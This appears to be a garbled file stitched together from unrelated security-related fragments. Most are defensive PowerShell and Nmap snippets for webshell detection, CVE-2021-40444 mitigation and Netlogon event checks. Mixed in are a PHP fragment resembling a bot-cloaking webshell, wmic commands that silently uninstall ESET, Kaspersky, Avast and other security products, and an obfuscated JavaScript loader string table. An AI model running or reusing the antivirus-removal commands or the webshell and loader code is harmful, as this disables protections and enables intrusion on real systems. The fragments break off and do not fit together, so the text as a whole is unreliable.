<#
Exchange IIS Server Integrity Check
Identify common webshells and backdoors associated with compromises
Usage:
Prepare a hash list. Note this may need to be updated after Microsoft Exchange updates
Write-IntegrityFile [ -hashfile "filename.json" ]
#>
<?php
if(!empty($_SERVER['HTTP_USER_AGENT'])){
    $userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");
    if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
local string = require "string"
author = {"technion@lolware.net"}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}
-- Detection rule based on: https://twitter.com/GossiTheDog/status/1424673929382268932
Set-StrictMode -Version 2
# Applies reg keys from https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
# Although the above document is still "Revision 1.0", Microsoft has removed the WOW6432 section
for($i = 0; $i -le 3; $i++) {
    $RegPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\$i"
    if (-not (Test-Path $RegPath)) {
        New-Item $RegPath -Force
    }
}
$autorunsCsv = "\AutorunsOutput.csv"
$autorunsArray = Import-Csv $autorunsCsv
Foreach ($item in $autorunsArray) {
    $detection = $item.'VT detection'
    if ($detection -eq "" -or $detection -eq 'Unknown') {
        continue
    }
    Write-Output $detection
}
$v='ipc';
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
Set-StrictMode -Version 2
# Connect first
# Connect-AzureAD
function Get-LicencesforUser
{
    param([object]$user)
    # $user should be populated with
    # $user = Get-AzureADUser -ObjectId username@domain.com
}
# More information: https://support.microsoft.com/en-au/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc
Set-StrictMode -Version 2
# Fetch all Domain Controllers. Use this pattern to fetch from all sites.
$addomain = Get-ADDomain
$controllers = Get-ADComputer -filter * -SearchBase "OU=Domain Controllers,$($addomain.DistinguishedName)"
foreach ($dc in $controllers) {
    # Errors are ignored so as not to throw an exception if there are no such logs found
    Get-WinEvent -FilterHashtable @{logname='system'; id=5827,5828,5829,5830,5831} -ComputerName $dc.Name -ErrorAction Ignore
}
'use strict';
/** @type {!Array} */
var _0xd60a = ["call", "unknown BTYPE: ", "innerHTML", "lazy", "invalid code length: ", "subarray", "createElement", "invalid compression type", "decompress", "input buffer is broken", "POSITIVE_INFINITY", "index", "verify", "charCodeAt", "bufferSize", "invalid uncompressed block header: LEN", "var ", "compile", "fromCodePoint", "finish", "bufferType", "shift", "compressionType", "input", "Zlib.Inflate.prototype.decompress", "invalid inflate mode", "slice", "NONE", "appendChild", "length", "string",
"Zlib.Inflate", "textContent", "prototype", "Zlib.Deflate.compress", "resize", "number", "invalid index", "documentElement", "buffer", "undefined", "trim", "unsupported compression type", "keys", "constructor", "Inflate", "unsupported compression method", "a9ae92d3-ee4f-4bc1-a8c5-7cff21373a99", "split", 'return /" + this + "/', "invalid adler-32 checksum", "getParent", "close", "invalid length: ", "push", "fromCharCode", "invalid code: ", "Zlib.Deflate.CompressionType", "write"